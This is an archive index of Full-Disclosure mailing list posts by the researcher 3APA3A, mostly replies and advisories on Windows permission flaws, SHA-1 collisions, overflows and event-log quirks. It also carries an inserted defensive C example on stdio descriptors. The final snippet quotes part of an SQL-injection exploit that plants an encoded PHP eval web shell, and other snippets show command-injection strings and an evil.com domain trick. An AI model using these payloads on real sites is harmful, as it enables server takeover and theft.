Dear Michał Majchrowicz, This image also effectively exploits a stack overflow (?) in FastStone Image Viewer 2.8; EIP/EBP is 0x41414141. --Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]: MM> Everytime you try to turn on the slideshow with a JPG file in the MM> folder

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-21 Thread 3APA3A
Dear Tim, --Wednesday, March 21, 2007, 7:24:35 PM, you wrote to full-disclosure@lists.grok.org.uk: T> Secondly, 3APA3A, birthday attacks against the collision-resistance T> property of a hash take approximately 2^(b/2) time, where b is the T> number of bits. That is, brute-force

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-21 Thread 3APA3A
at 160-bits) were 100% secure. The attack BB> under discussion is reported to reduce that to the neighborhood of BB> 60-something bits. BB> I am not a mathematician though, so I would be perfectly willing to BB> believe I was wrong about that. BB>

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-21 Thread 3APA3A
and 3 years after losing the last pencil I may be completely wrong in computations :) --Wednesday, March 21, 2007, 9:48:55 PM, you wrote to [EMAIL PROTECTED]: BB> 3APA3A wrote: >> I know meaning of 'hash function' term, I wrote few articles on >> challenge-respon

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-21 Thread 3APA3A
er calling ability to bruteforce 160-bit hash 2000 times faster 'a crack'? --Wednesday, March 21, 2007, 8:53:27 PM, you wrote to [EMAIL PROTECTED]: BB> 3APA3A wrote: >> First, by reading 'crack' I thought lady can recover full message by >> it's s

Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-21 Thread 3APA3A
Dear Michael Silk, First, by reading 'crack' I thought the lady can recover the full message by its signature. After careful reading, she can bruteforce collisions 2000 times faster. SHA-1 is a 160-bit hash. Bruteforced 2000 times faster, it retains the strength of a 149-bit hash for bruteforce co

Re: [Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

2007-03-20 Thread 3APA3A
Dear starcadi, Again, a very effective way for a user to exploit himself. How can you elevate your privileges that way? Is dkftpbench suid? --Monday, March 19, 2007, 10:32:27 PM, you wrote to full-disclosure@lists.grok.org.uk: s> Description: s> dkftpbench is an FTP benchmark program inspire

Re: [Full-disclosure] cftp 0.12 (readrc) Local buffer overflow vulnerability

2007-03-20 Thread 3APA3A
Dear starcadi, A very effective way for a user to exploit himself. How can you elevate your privileges this way? Is cftp suid? --Tuesday, March 20, 2007, 12:52:13 AM, you wrote to full-disclosure@lists.grok.org.uk: s> Description: s> CFTP is Comfortable FTP, a full screen ftp client. s> Proo

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-10 Thread 3APA3A
Dear Thor (Hammer of God), You are wrong at least for Windows XP/2003. There is a common temporary directory, %WINDIR%\Temp. It's used as %TEMP% if an application is launched without local logon, e.g. a system service. For example, services launched with the LocalSystem account will have this

[Full-disclosure] Pre-open files attack against locked file

2007-03-10 Thread 3APA3A

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-09 Thread 3APA3A
Dear Laundrup, Jens, C:\TEMP is not the best example, but there are others. Microsoft Word creates a temporary file with a predictable name in the same directory as the document. In the case of directory permissions like: Users: Add & List; Creator Owner: Full control (one user should not read documents

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-09 Thread 3APA3A
Dear Michele Cicciotti, --Friday, March 9, 2007, 9:00:05 PM, you wrote to full-disclosure@lists.grok.org.uk: >> Scenario 1.1: >> >> Bob wishes to create "Bob private data" folder in "Public" folder to >> place few private files. "Public" has at least "Write" permissions for >> "User" g

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-09 Thread 3APA3A
Dear Roger A. Grimes, --Friday, March 9, 2007, 6:49:13 PM, you wrote to [EMAIL PROTECTED]: RAG> For one, I've been a sys admin for 20 years and NEVER created a RAG> private folder under a public folder. Nice. What about creating a "Sales Reports" folder only the head of the Sales department has

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-09 Thread 3APA3A
Dear M. Burnett, --Friday, March 9, 2007, 7:12:31 AM, you wrote to [EMAIL PROTECTED]: MB> 3APA3A, I just wanted to say that is very clever research you have done. MB> It's true that this does require some re-thinking of security practices, but MB> I don't think it

Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-09 Thread 3APA3A
noted by everyone, but was unnoticed for 10 years. RAG> Roger RAG> * RAG> *Roger A. Grimes, InfoWorld, Security Columnist RAG> *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yad

[Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-08 Thread 3APA3A
: 3APA3A, http://securityvulns.com/ Vendor: Microsoft (and potentially other vendors) Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit for Windows 2000 and different utilities. Access Vector: Local Type: multiple/complex (weak design, insecure file operations, etc

[Full-disclosure] MOPB-08-2007 - dejavu of dejavu

2007-03-04 Thread 3APA3A
Hello mopb, phpinfo() cross-site scripting http://www.php-security.org/MOPB/MOPB-08-2007.html was initially(?) reported in 2003 by Silent Needle http://securityvulns.com/docs4647.html -- /3APA3A http://securityvulns.com/

Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal

2007-02-27 Thread 3APA3A
Probably, it's the same or a related issue to the one reported by nicob at nicob.net. http://securityvulns.com/news/KIWI/CatTools/DT.html CVE-2007-0888 --Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@securityfocus.com: n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.

[Full-disclosure] Few unreported vulnerabilities by SehaTo

2007-02-25 Thread 3APA3A

Re: [Full-disclosure] Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW information leak

2007-02-22 Thread 3APA3A
rver/citrix where all our stored documents can be stolen. AT> In that case, only a software restriction policy will protect us. AT> regards, AT> Andres Tarasco AT> 2007/2/22, 3APA3A <[EMAIL PROTECTED]>: >> >> >> >> Title: Microsoft Wi

[Full-disclosure] Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW information leak

2007-02-22 Thread 3APA3A
Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW information leak Author: 3APA3A, http://securityvulns.com Affected: Microsoft Windows 2000,XP,2003,Vista Exploitable:Yes Type: Remote (from local network), authentication

Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability

2007-02-20 Thread 3APA3A
Dear Rajesh Sethumadhavan, As Michal Zalewski pointed out, there is no "critical" security impact, because you (as the attacker) can force the browser to open files (it's a common thing, you can do it in any browser), but you cannot access the content of these files. The only security impact in a few cases i

Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

2007-02-15 Thread 3APA3A
Dear Michal Zalewski, Mitigating factor: it doesn't work through a proxy, because for a proxy the URI is sent instead of the URL and the request will be incomplete. GET http://evil.com --Thursday, February 15, 2007, 1:23:01 AM, you wrote to [EMAIL PROTECTED]: MZ> 'evil.com\x00foo.example.com' to be a part

[Full-disclosure] SecurityVulns.com: Microsoft Visual C++ 8.0 standard library time functions invalid assertion DoS (Problem 3000).

2007-02-12 Thread 3APA3A
: CVE-2007-0842 Author: 3APA3A, http://SecurityVulns.com/ Advisory URL: http://SecurityVulns.com/advisories/year3000.asp Intro: Since Microsoft Visual Studio 5.0, the Visual C++ compiler defaults the time_t type to a 64-bit integer and time functions to their 64-bit variants. Vulnerability: 64

[Full-disclosure] SecurityVulns.com: HP Network Node Manager remote console weak files permissions

2007-02-08 Thread 3APA3A
unprivileged user to Local System or another user's account. Author: 3APA3A <[EMAIL PROTECTED]>, http://SecurityVulns.com Advisory URL: http://securityvulns.com/advisories/nnmrc.asp SecurityVulns news URL: http://securityvulns.com/news/HP/NNM/RC/WP.html CVE:CVE-2007-0819

[Full-disclosure] (offtopic) Re: Bluepill's Rutkowska was or is a Man ?!

2007-02-06 Thread 3APA3A
Dear [EMAIL PROTECTED], --Tuesday, February 6, 2007, 2:17:55 AM, you wrote to full-disclosure@lists.grok.org.uk: whc> I found this in deleted edits on english Wikipedia on Bluepill whc> Vista backdoor security researcher Joanna Rutkowska: whc> http://www.rutkowska.yoyo.pl whc> What is goin

Re: [Full-disclosure] detecting targetted malware

2007-01-22 Thread 3APA3A
Dear lsi, This approach is already implemented, at least partially, to limit functionality of unknown applications. It can be found in multiple personal firewalls or things like http://www.securesize.com/GeSWall/ There is a better approach - every "good" application should be signed

Re: [Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor

2007-01-18 Thread 3APA3A
Dear XFOCUS Security Team, A more complicated variant of this vulnerability (exhausting all available descriptors and closing a standard one) was reported by Joost Pol for BSD systems. It's very funny to see that commercial Unix variants were not checked against it and the simplest variant of
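
The thread is about programs that may be started with one of the standard descriptors 0, 1 or 2 closed, so that the next file the program opens lands on that number and is then written to or read from as if it were stdin, stdout or stderr. The added example below, not from the thread, is the usual defence applied early in such a program: verify each of the three descriptors and point closed ones at /dev/null. It also covers the exhaustion variant mentioned in the reply, where /dev/null cannot be opened at all: that is returned as a failure so the caller can abort instead of continuing. Function names are this example's own.

```c
/* Added example, not from the thread: make sure fds 0, 1 and 2 are open
 * before a program that may be started with them closed does anything
 * else.  A closed standard descriptor is otherwise reused by the next
 * open(), and that file then receives the program's stdio traffic.  If
 * the descriptor table is exhausted (the variant mentioned in the reply)
 * open() fails and -1 is returned so the caller can bail out. */
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* 1 if fd refers to an open descriptor, 0 if it is closed. */
int fd_is_open(int fd)
{
    return fcntl(fd, F_GETFD) != -1 || errno != EBADF;
}

/* Repairs closed descriptors in 0..2 by pointing them at /dev/null.
 * Returns the number of descriptors repaired, or -1 on failure. */
int ensure_std_fds(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fd_is_open(fd))
            continue;
        /* stdin is opened read-only, stdout/stderr write-only. */
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd == -1)
            return -1;              /* EMFILE or similar: do not continue */
        if (nfd != fd) {            /* defensive: move it onto the slot we want */
            if (dup2(nfd, fd) == -1) {
                close(nfd);
                return -1;
            }
            close(nfd);
        }
        repaired++;
    }
    return repaired;
}
```

Because the loop walks 0, 1, 2 in order and fills each gap as it goes, `open()` normally returns exactly the descriptor being repaired; the `dup2` branch only matters if something else opened a lower descriptor in between. A privileged program should treat a -1 return as fatal.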

Re: [Full-disclosure] 0trace - traceroute on established connections

2007-01-14 Thread 3APA3A
Dear Robert Swiecki, --Sunday, January 14, 2007, 2:49:58 AM, you wrote to bugtraq@securityfocus.com: RS> User-Agent: &*^ VDjh; RS> olsMoasdasdzilla2%$(ls)2=++/-2121%&^#%^@&37.0 (X1230#$(ls)`ls`) RS> asd%^*&%^dasdnhy/ Mnenhy/0.7.4.0 H. It doesn't seem like an attempt to exploit

Re: [Full-disclosure] msgina.dll BSOD

2006-12-29 Thread 3APA3A
Dear /dev/null, To manipulate GINA you need administrative privileges. --Friday, December 29, 2006, 3:34:51 AM, you wrote to full-disclosure@lists.grok.org.uk: dn> Hi, dn> This is from MS forums: dn> http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=1043407&SiteID=1 dn> Tested on Windows

Re: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB

2006-12-22 Thread 3APA3A
Dear 0o_zeus_o0 elitemexico.org, Thanks, published. http://www.security.nnov.ru/source13365.html --Friday, December 22, 2006, 11:55:17 PM, you wrote to [EMAIL PROTECTED]: 0eo> ### 0eo> # Advisory #15 Title: Multiple Remote

Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-22 Thread 3APA3A
before second free(). --Thursday, December 21, 2006, 11:11:29 PM, you wrote to [EMAIL PROTECTED]: AS> 3APA3A wrote: >> Killer{R} assumes the problem is in strcpy(), because it should not be >> used for overlapping buffers, but at least ANSI implementation of strcpy >> from

Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear Michele Cicciotti, --Thursday, December 21, 2006, 6:20:54 PM, you wrote to full-disclosure@lists.grok.org.uk: >> There is an interesting thing with event logging on Windows. The only >> security aspect of it is event log record tampering and performance >> degradation, but it may

Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear Tim, --Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]: T> 3APA3A, have you tried to see if elements like "%n!FORMAT!" used T> recursively will invoke the wsprintf()-like behavior?? Yes, I did. It doesn't work. -- ~/ZARAZA But then, to whom

Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread 3APA3A
Dear lists, in another Russian forum, Killer{R} made analysis on this issue using Windows 2000 sources: http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672 The problem is in win32k.sys' function GetHardErrorText, which tries to prepare EXCEPTION data for event log, and seems to b

[Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
sting event log entries if you try something like: net send SOMEHOST %2 or net use \\SOMEHOST\IPC$ /user:%1%2%3 -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatle

[Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread 3APA3A
ty.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-o66o--+ / |/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk

Re: [Full-disclosure] Evasion Schemes or techniques

2006-12-12 Thread 3APA3A
Dear Kassem Nasser, It's not clear: do you mean protection or protection evasion? --Sunday, December 10, 2006, 10:50:41 PM, you wrote to full-disclosure@lists.grok.org.uk: KN> Dear all, KN> I am interested in knowing evasion schemes for application based KN> intrusions available, -- ~/ZARA

Re: [Full-disclosure] PayPal acount removal: bug or feature?

2006-11-29 Thread 3APA3A
hursday, November 30, 2006, 1:02:07 AM, you wrote to [EMAIL PROTECTED]: MF> I tried this on Paypal.com, with more than twenty consecutive incorrect MF> passwords. I got no such offer. What paypal site were you using, and MF> how many unsuccessful attempts is a couple? MF> Matt M

[Full-disclosure] PayPal acount removal: bug or feature?

2006-11-29 Thread 3APA3A
e inexperienced with PayPal, because its service for Russia is new and very limited. But it makes me wonder: is this "Feature" known? -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-+ \ | ZARAZA U 3APA3A } You know my n

[Full-disclosure] :ShAnKaR: WoltLab Burning Book <=1.1.2 multiple vulnerabilities

2006-10-16 Thread 3APA3A
27;,[reg_image=>0,send=>'send',name=>1,message=>1, n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]); -- /3APA3A http://security.nnov.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
